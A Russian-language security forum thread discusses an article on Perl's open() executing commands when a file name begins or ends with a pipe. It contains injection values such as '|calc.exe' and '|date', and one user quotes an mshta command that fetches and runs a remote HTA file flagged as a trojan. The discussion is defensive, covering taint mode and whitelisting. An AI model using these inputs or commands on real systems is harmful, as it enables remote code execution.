| 

Легенда:
  новое сообщение 
  закрытая нитка 
  новое сообщение 
  в закрытой нитке 
  старое сообщение   | 
Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
Новичкам также крайне полезно ознакомиться с данным документом.
|  |  |  |  |  |  | БРЕД  05.01.04 10:37  Число просмотров: 3513 Автор: Юниксоид Статус: Незарегистрированный пользователь
 |  
| > > > Что такое "подать на вход" ? > > Это значит что заходишь на веб-сайт, и при помощи
 > одного
 > > лишь браузера можешь его взломать (запустить там
 > > произвольный код).
 > > Нового действительно в этом ничего нет. :-)
 >
 > Наивный!
 > Учите perl. Нового тут ничего нет.
 >
 > $ cat /tmp/0
 > #!/usr/local/bin/perl
 >
 > $filename="|date";
 > open(HTM1,$filename);
 > $ /tmp/0
 > Mon Jan  5 12:13:18 ZLT 2004
 >
 > $ cat /tmp/1
 > #!/usr/local/bin/perl -T
 >
 > $filename="|date";
 > open(HTM1,$filename);
 > $ /tmp/1
 > Insecure $ENV{PATH} while running with -T switch at /tmp/1
 > line 4.
 > $
 >
 > Вопросы есть?

да, и, кстати, нормальные люди проверяют
 не наличие "недопустимых" символов,
 а наличие только допустимых...
 исходя из общего принципа, что запрещено все, что
 явно не разрешено...
 т.е. должен быть короткий список разрешенных символов,
 а не большой и заведомо неполный запрещенных...

Я уж не говорю о том,
 что разрешать всем через web открывать любой файл на сервере - это полный бред...
 тут совсем не perl виноват(или его разработчики), а кто-то другой...

Я, кстати, совсем не фанатик perl-а...
 но не надо с больной головы на здоровую перекладывать...
 |  | <site updates> |  
| Защищаем Perl: шунт в мозг, или зверская нейрохирургия  27.12.03 01:38 Publisher: dl <Dmitry Leonov>
 |  
| Защищаем Perl: шунт в мозг, или зверская нейрохирургия Роман Чертанов roman_chertanov@mail.ru

P  { font-family : Arial; font-size : 14px; color : #000000; }
 PRE  { font-size : 12px; color : #000000; }
 I  { font-size : 14px; color : #000077; }
 LI  { font-family : Arial; font-size : 14px; color : #000000; }
 blockquote { font-family : Times; font-size : 14px; color : #000000; font-style: italic}
 Если вы программируете (или собираетесь программировать)
 Internet-приложения на языке Perl, то наверняка сталкивались с
 информацией, описывающей уязвимости этого языка для хакерских
 атак. Простейший скрипт, приведенный в любом учебнике по языку Perl,
 на поверку оказывается "широко открытыми воротами" для хакеров, как
 многоопытных, так и начинающих. Например, фрагмент кода, который просто
 выводит содержимое указанного файла
 open(f,$filename);
  while(<f>)
  {
   print;
  }
 на самом деле может выполнять и другие действия. Подайте на его вход
 строку "|calc.exe", и вы запустите на выполнение...

Полный текст
 |  
|  | строку "|calc.exe", и вы запустите на
  06.01.04 13:31 Автор: Матвей Статус: Незарегистрированный пользователь
 |  
| > Защищаем Perl: шунт в мозг, или зверская нейрохирургия > Роман Чертанов roman_chertanov@mail.ru

> на самом деле может выполнять и другие действия. Подайте на
 > его вход
 строку "|calc.exe", и вы запустите на
 > выполнение...

вся статья теряет смысл (включая "лоботомии") когда прочитаешь perldoc perlrun на предмет ключа -T
 |  
|  |  | Зараженный режим не всегда катит...  08.01.04 13:03 Автор: Роман Чертанов Статус: Незарегистрированный пользователь
 |  
| > вся статья теряет смысл (включая "лоботомии") когда > прочитаешь perldoc perlrun на предмет ключа -T
 ... хотя Вы правы, по-хорошему надо бы изменить статью, чтобы там это было. "зараженный режим" требует неочевидной и достаточно громоздкой переделки кода (в учебниках, например, никто ничего не фильтрует, и новичку может быть непонятно вообще как это делать). Предложенный же в статье трюк не налагает никаких требований на пользователя, и не требует ничего менять в уже работающем и отлаженном коде.
 |  
|  |  |  | Какой он нафиг отлаженный, если в нем дыры, позволяющие...  26.01.04 18:37 Автор: amigo Статус: Незарегистрированный пользователь
 |  
| > трюк не налагает никаких требований на пользователя, и не > требует ничего менять в уже работающем и отлаженном коде.

Какой он нафиг отлаженный, если в нем дыры, позволяющие файлы запускать?

К тому же использовать для открытия файлов функцию-wrapper для новичкагораздопроще, чем искать вызовы WinAPI через SoftICE.
 |  
|  |  |  |  | wrapper  14.02.04 18:39 Автор: Роман Чертанов Статус: Незарегистрированный пользователь
 |  
| > Какой он нафиг отлаженный, если в нем дыры, позволяющие
 > файлы запускать?
 >
 Я имею в виду разного рода примеры, которые новички могут встретить в инете или в книгах. Они совсем не обязательно заточены на исп. ключа -T.

> К тому же использовать для открытия файлов функцию-wrapper
 > для новичкагораздопроще, чем искать вызовы WinAPI через
 > SoftICE.

Так я враппер и рекламирую? А если недоступны исходники (или лень их качать и компилить), то можно по быстрому покоцать пару функций в dll. SoftIce здесь не нужен (я его не юзал), хотя как вариант возможен и он.
 |  
|  | 05-01-2004 09:49:34 C:\Documents and Settings\....\Local...  05.01.04 02:00 Автор: SkyRanger Статус: Незарегистрированный пользователь
 |  
| 05-01-2004 09:49:34 C:\Documents and Settings\....\Local Settings\Temporary Internet Files\Content.IE5\CPIN8L6R\foobar[1].htm инфицирован Trojan.MulDrop.500 - доступ к файлу запрещен 
 Это что за приколы позвольте спросить???
 Предварительное скачивание и запуск показал что тама сидит троянчик!
 Ради прикола я его
 mshta.exe http://www.malware.com/foobar.hta
 запустил и мой drweb заорал мол вай-вай вирус однака! :)

Может не нада делать таких вещей??? Некрасиво как то...
 |  
|  |  | Антивирусы показывают не троян, а потенциальную возможность трояна  08.01.04 00:47 Автор: Роман Чертанов Статус: Незарегистрированный пользователь
 |  
| Дело в том, что в антивирусные базы внесен указанный способ вторжения. Об этом красным по белому (правда, по английски) есть предупреждение на сайте malware.com. Но то, что там прикреплен не деструктивный файл, а просто прога под названием fire.exe (которая показывает огонь), я проверял. Попробуйте и вы прикрепить прогу "hello. world", антивирусы ругнутся точно так же. Они не хотят и не обязаны проверять что там прикреплено, и абсолютно правильно предупреждают юзеров о возможной опасности. Сайт умный и нормальный, поэтому я им доверяю. 
 > 05-01-2004 09:49:34 C:\Documents and Settings\....\Local
 > Settings\Temporary Internet
 > Files\Content.IE5\CPIN8L6R\foobar[1].htm инфицирован
 > Trojan.MulDrop.500 - доступ к файлу запрещен
 >
 > Это что за приколы позвольте спросить???
 > Предварительное скачивание и запуск показал что тама сидит
 > троянчик!
 > Ради прикола я его
 > mshta.exe http://www.malware.com/foobar.hta
 > запустил и мой drweb заорал мол вай-вай вирус однака! :)
 >
 > Может не нада делать таких вещей??? Некрасиво как то...
 |  
|  | ничего нового... разве-что нестандартный взляд на защиту...  29.12.03 14:51 Автор: DgtlScrm Статус: Member
 |  
| ничего нового... разве-что нестандартный взляд на защиту перла... хотя как на меня обычное правильное написание програм защитит и так... |  
|  |  | Правильное написание программ, говорите?  16.05.04 16:09 Автор: feldgendler Статус: Незарегистрированный пользователь
 |  
| > ничего нового... разве-что нестандартный взляд на защиту > перла... хотя как на меня обычное правильное написание
 > програм защитит и так...

В статье автор справедливо заметил, что для того, чтобы защитить такой участок кода, как open(f,$filename), приходится быть экспертом по Perl. Я охотно верю, что Вы и есть такой эксперт и знаете обо всех специальных возможностях функции open() и других функций, а, значит, можете произвести все необходимые проверки, чтобы избежать нежелательного задействования таких возможностей (оставим за скобками фактор человеческой рассеянности). Но есть ещё и такой момент: вот эта упомянутая возможность с символом |, наверное, не в первой версии Perl появилась -- просто в какой-то момент её добавили, посчитав, что это полезно и удобно. А если в следующей версии Perl добавят ещё одну новую возможность? Тогда, получается, Вы уже не будете абсолютным экспертом по Perl, и может оказаться, что ваша существующая, правильно написанная программа при запуске под новой версией Perl окажется уязвимой. Следовательно, чтобы писать безопасные программы, нужно быть экспертом по всем возможностям Perl и постоянно быть в курсе всех новых возможностей. Кроме того, существующие программы могут оказаться уязвимыми в свете появления новых возможностей, и их потребуется исправлять

Справедливости ради хочу заметить, что разработчики практически всех серверных программных средств, включая авторов Perl, уже осознали степень риска, вводимого всевозможныминеявными"фишками" вроде упомянутого знака |, и в новых версиях мы вряд ли увидим такие новые автоматические средства, включить которые можно неосторожным движением. Напротив, более вероятно, что каждая новая версия будет более ограниченной в таких "автоматических" средствах при настройках по умолчанию. Я не знаток Perl, но насчёт PHP могу сказать, что именно так и происходит. Когда-то, например, параметры, указанные в HTTP-запросе, автоматически преобразовывались в переменные с такими именами, а это значит, что, если какую-то переменную забыли инициализировать явно, понадеявшись на автоматическую инициализацию пустым значением, есть возможность повлиять на выполнение скрипта, приписав к URL суффикс ?variable=value. Начиная с некоторой версии PHP, такое поведение больше не действует по умолчанию, но доступно по специальной настройке, в основном для обратной совместимости.

Также считаю нужным сказать, что мой комментарий ни в коем случае нельзя рассматривать как утверждение о том, что практика constrain and sanitize (проверки всех входных значений) бесполезная порочная. Напротив, я обеими руками за последовательное применение такой практики, а также за введение в языки и библиотеки автоматизированных средств для этого (таких, как функция htmlescape() в PHP). Во-первых, два рубежа защиты лучше, чем один, и в сочетании с методом, описанным в статье, проверка входных значений даст ещё лучший уровень защищённости. А, во-вторых, далеко не все виды атак принципиально пресекаемы при помощи описанного автором метода; так, например, классическое SQL injection (внедрение SQL-фрагментов во входные данные) невозможно предотвратить таким способом.
 |  
|  | open(f,$filename);
  29.12.03 06:52 Автор: Юниксд после лоботомии... Статус: Незарегистрированный пользователь
 |  
| >
 open(f,$filename);
 while(<f>)
 {
 print;
 }

> на самом деле может выполнять и другие действия. Подайте на
 > его вход
 строку "|calc.exe", и вы запустите на
 > выполнение...

Интересно, а если в Unix на вход подать "|date" то это должно сработать?
 Если да, то почему у меня не срабатывает???

|  
|  |  | надо сделать $filename = "date|"  29.12.03 19:14 Автор: LLL <Алексей> Статус: Member
 |  
| ибо date в юниксе ничего не берет со входа |  
|  |  | Перепроверил в виндах - работает  29.12.03 18:57 Автор: Роман Чертанов Статус: Незарегистрированный пользователь
 |  
| > >Подайте на  его вход  строку "|calc.exe", и вы запустите на > > выполнение...
 >
 > Интересно, а если в Unix на вход подать "|date" то это
 > должно сработать?
 > Если да, то почему у меня не срабатывает???
 >
 Я перепроверил этот код с последней версией ActivePerl в виндах - эта кора именно там есть. :-)

Ты так делал?
 #perl
 $filename="|date";
 open (HTM1,$filename);

У меня этот фрагмент спрашивает, не хочу ли я ввести текущую дату.
 |  
|  |  |  | ;-)  хм...  
  31.12.03 07:30 Автор: Юниксоид с опухшей головой Статус: Незарегистрированный пользователь
 |  
| > > >Подайте на  его вход  строку "|calc.exe", и вы > запустите на
 > > > выполнение...
 > >
 > > Интересно, а если в Unix на вход подать "|date" то это
 > > должно сработать?
 > > Если да, то почему у меня не срабатывает???
 > >
 > Я перепроверил этот код с последней версией ActivePerl в
 > виндах - эта кора именно там есть. :-)
 >
 > Ты так делал?
 > #perl
 > $filename="|date";

;-)  хм...
 я бы удивился, если бы эта команда не делала то, что она должна делать....

Что такое "подать на вход" ?
 Имеется в виду стандартный ввод или файл,
 т.е. "|date" подается как данные...
 Если это не так, а имеется в виду, то что выше,
 то я вообще не пойму, что тут обсуждать....
 И что тут нового?

> open (HTM1,$filename);
 >
 > У меня этот фрагмент спрашивает, не хочу ли я ввести
 > текущую дату.

|  
|  |  |  |  | > Что такое "подать на вход" ?  31.12.03 14:48 Автор: Роман Чертанов Статус: Незарегистрированный пользователь
 |  
| > Что такое "подать на вход" ? Это значит что заходишь на веб-сайт, и при помощи одного лишь браузера можешь его взломать (запустить там произвольный код).
 Нового действительно в этом ничего нет. :-)
 |  
|  |  |  |  |  | бред  05.01.04 10:17 Автор: Юниксоид Статус: Незарегистрированный пользователь
 |  
| > > Что такое "подать на вход" ? > Это значит что заходишь на веб-сайт, и при помощи одного
 > лишь браузера можешь его взломать (запустить там
 > произвольный код).
 > Нового действительно в этом ничего нет. :-)

Наивный!
 Учите perl. Нового тут ничего нет.

$ cat /tmp/0
 #!/usr/local/bin/perl

$filename="|date";
 open(HTM1,$filename);
 $ /tmp/0
 Mon Jan  5 12:13:18 ZLT 2004

$ cat /tmp/1
 #!/usr/local/bin/perl -T

$filename="|date";
 open(HTM1,$filename);
 $ /tmp/1
 Insecure $ENV{PATH} while running with -T switch at /tmp/1 line 4.
 $

Вопросы есть?

|  
|  |  |  |  |  |  | БРЕД  05.01.04 10:37 Автор: Юниксоид Статус: Незарегистрированный пользователь
 |  
| > > > Что такое "подать на вход" ? > > Это значит что заходишь на веб-сайт, и при помощи
 > одного
 > > лишь браузера можешь его взломать (запустить там
 > > произвольный код).
 > > Нового действительно в этом ничего нет. :-)
 >
 > Наивный!
 > Учите perl. Нового тут ничего нет.
 >
 > $ cat /tmp/0
 > #!/usr/local/bin/perl
 >
 > $filename="|date";
 > open(HTM1,$filename);
 > $ /tmp/0
 > Mon Jan  5 12:13:18 ZLT 2004
 >
 > $ cat /tmp/1
 > #!/usr/local/bin/perl -T
 >
 > $filename="|date";
 > open(HTM1,$filename);
 > $ /tmp/1
 > Insecure $ENV{PATH} while running with -T switch at /tmp/1
 > line 4.
 > $
 >
 > Вопросы есть?

да, и, кстати, нормальные люди проверяют
 не наличие "недопустимых" символов,
 а наличие только допустимых...
 исходя из общего принципа, что запрещено все, что
 явно не разрешено...
 т.е. должен быть короткий список разрешенных символов,
 а не большой и заведомо неполный запрещенных...

Я уж не говорю о том,
 что разрешать всем через web открывать любой файл на сервере - это полный бред...
 тут совсем не perl виноват(или его разработчики), а кто-то другой...

Я, кстати, совсем не фанатик perl-а...
 но не надо с больной головы на здоровую перекладывать...
 |  
|  |  |  |  |  |  |  | Insecure $ENV{PATH} while running with -T  08.01.04 13:41 Автор: Роман Чертанов Статус: Незарегистрированный пользователь
 |  
| > > $ cat /tmp/1 > > #!/usr/local/bin/perl -T
 > >
 > > $filename="|date";
 > > open(HTM1,$filename);
 > > $ /tmp/1
 > > Insecure $ENV{PATH} while running with -T switch at
 > /tmp/1
 > > line 4.
 > > $
 > >
 > > Вопросы есть?

Мне кажется что способ с подменой функций прикольнее. :-)
 Не потребуется переделывать код во многих местах.
 Проще для новичков.

> да, и, кстати, нормальные люди проверяют
 > не наличие "недопустимых" символов,
 > а наличие только допустимых...
 > исходя из общего принципа, что запрещено все, что
 > явно не разрешено...
 > т.е. должен быть короткий список разрешенных символов,
 > а не большой и заведомо неполный запрещенных...

Ну так тоже можно. Это как дедукция (исключение) и индукция
 (включение). Какой метод лучше, сказать трудно :-)

> Я уж не говорю о том,
 > что разрешать всем через web открывать любой файл на
 > сервере - это полный бред...

Ну я тоже об этом не говорю :-)
 Просто новички именно так и поступают, потому что программные продукты сами по себе стимулируют их делать ошибки.

> тут совсем не perl виноват(или его разработчики), а кто-то
 > другой...

Ну да, разработчики ОС :-)

> Я, кстати, совсем не фанатик perl-а...
 > но не надо с больной головы на здоровую перекладывать...

Я тоже :-)
 |  
|  |  |  |  |  |  |  |  | лудче запретить все и разрашать, только по мере...  13.01.04 08:25 Автор: DgtlScrm Статус: Member
 |  
| > > да, и, кстати, нормальные люди проверяют > > не наличие "недопустимых" символов,
 > > а наличие только допустимых...
 > > исходя из общего принципа, что запрещено все, что
 > > явно не разрешено...
 > > т.е. должен быть короткий список разрешенных символов,
 > > а не большой и заведомо неполный запрещенных...
 >
 > Ну так тоже можно. Это как дедукция (исключение) и индукция
 > (включение). Какой метод лучше, сказать трудно :-)

лудче запретить все и разрашать, только по мере необходимости. Это однозначно!

> > тут совсем не perl виноват(или его разработчики), а
 > кто-то
 > > другой...

> Ну да, разработчики ОС :-)

это не ошибка а фича... и виноват именно программист! А не ОС или Перл :Р
 |  
|  |  | Наверное у тебя перед трубой добавляется слеш...  29.12.03 14:53 Автор: DgtlScrm Статус: Member
 |  
|  |  
|  | Гы, ну от эклектичности Перл не избавится, думаю, никогда :)  28.12.03 00:55 Автор: Ktirf <Æ Rusakov> Статус: Elderman
 |  
| А вообще статья хорошая. |  

|  |